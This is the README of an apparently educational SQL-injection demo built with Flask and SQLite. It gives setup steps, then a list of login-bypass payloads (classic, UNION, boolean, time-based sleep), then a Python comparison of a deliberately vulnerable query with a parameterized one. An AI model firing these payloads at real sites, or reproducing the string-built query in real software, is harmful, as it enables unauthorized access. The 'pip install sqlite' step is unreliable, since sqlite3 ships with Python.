jfr3sam/Information-Security--SQL-Injections--Demo-

Demo Project

This README provides step-by-step instructions for setting up a Python virtual environment across different operating systems. The guide also includes additional tips for working with Flask and SQLite.

Table of Contents

  1. Setting Up a Virtual Environment
  2. Activating the Virtual Environment
  3. Working with Flask
  4. Working with SQLite
  5. Testing SQL Injections

Setting Up a Virtual Environment

Windows

  1. Open Command Prompt: Press Windows + R, type cmd, and hit Enter.
  2. Navigate to Project Directory: Use the cd command to navigate to your project folder.
  3. Create Virtual Environment:
    python -m venv env

macOS and Linux

  1. Open Terminal: Open it from the Applications folder or search for it using Spotlight (Cmd + Space).
  2. Navigate to Project Directory: Use the cd command to go to your project folder.
  3. Create Virtual Environment:
    python3 -m venv env

Activating the Virtual Environment

Windows

  1. Activate Virtual Environment:
    .\env\Scripts\Activate

macOS and Linux

  1. Activate Virtual Environment:
    source env/bin/activate

Working with Flask

  1. Install Flask:
    pip install Flask
  2. Run Flask Application:
    flask run

Working with SQLite

  1. Install SQLite:
    pip install sqlite
  2. Initialize Database:
    python init_db.py

Testing SQL Injections

Classic SQL Injection

  1. Username:

    ' OR '1'='1
  2. Password:

    ' OR '1'='1

Union-based SQL Injection

SQLite doesn't allow multiple statements in a single SQL query, which limits the types of UNION queries you can perform. However, you can still test basic UNION-based SQL injections.

  1. Username:

    ' UNION SELECT NULL, 'a', 'b' --
  2. Password:

    Leave it blank

Boolean-based SQL Injection

  1. Username:

    ' OR '1'='1
  2. Password:

    ' OR '1'='2

Time-based Blind SQL Injection

SQLite does not have built-in sleep functions, but for databases that do (like MySQL), you could use payloads like:

  1. Username:

    ' OR IF('1'='1', sleep(10), 0) --
  2. Password:

    Leave it blank
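
Why the payloads above behave as they do, and how a parameterized query neutralizes them, shown as an added example that is not code from this repository. The `users` table layout, the sample account, the three-column SELECT and the function names are assumptions, since the page does not show the application's query or `init_db.py`.

```python
import sqlite3

def make_db():
    # Constructed schema and account (plaintext password only to keep the demo short);
    # the repository's init_db.py is not shown on the page.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", ("alice", "s3cret"))
    return conn

def login_vulnerable(conn, username, password):
    # Input is spliced into the SQL text, so a quote in it changes the query's structure.
    query = ("SELECT id, username, password FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    return conn.execute(query).fetchone()

def login_parameterized(conn, username, password):
    # Placeholders bind the input as values; it is compared literally and never parsed as SQL.
    query = "SELECT id, username, password FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()

# Payload pairs (username, password) copied from the sections above.
PAYLOADS = {
    "classic": ("' OR '1'='1", "' OR '1'='1"),
    "union": ("' UNION SELECT NULL, 'a', 'b' --", ""),
    "boolean": ("' OR '1'='1", "' OR '1'='2"),
}

def compare(conn):
    # For each payload: (row from the vulnerable query, row from the bound query).
    return {name: (login_vulnerable(conn, u, p), login_parameterized(conn, u, p))
            for name, (u, p) in PAYLOADS.items()}

if __name__ == "__main__":
    db = make_db()
    for name, (vuln, safe) in compare(db).items():
        print(f"{name:8} vulnerable={vuln!r} parameterized={safe!r}")
    # The real credentials still work through the parameterized query.
    print("valid   ", login_parameterized(db, "alice", "s3cret"))
```

With this assumed query shape the boolean pair returns no row because AND binds tighter than OR, while the classic pair returns the stored account and the UNION payload returns the injected row. The parameterized query returns nothing for any of the three and still accepts the valid credentials.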
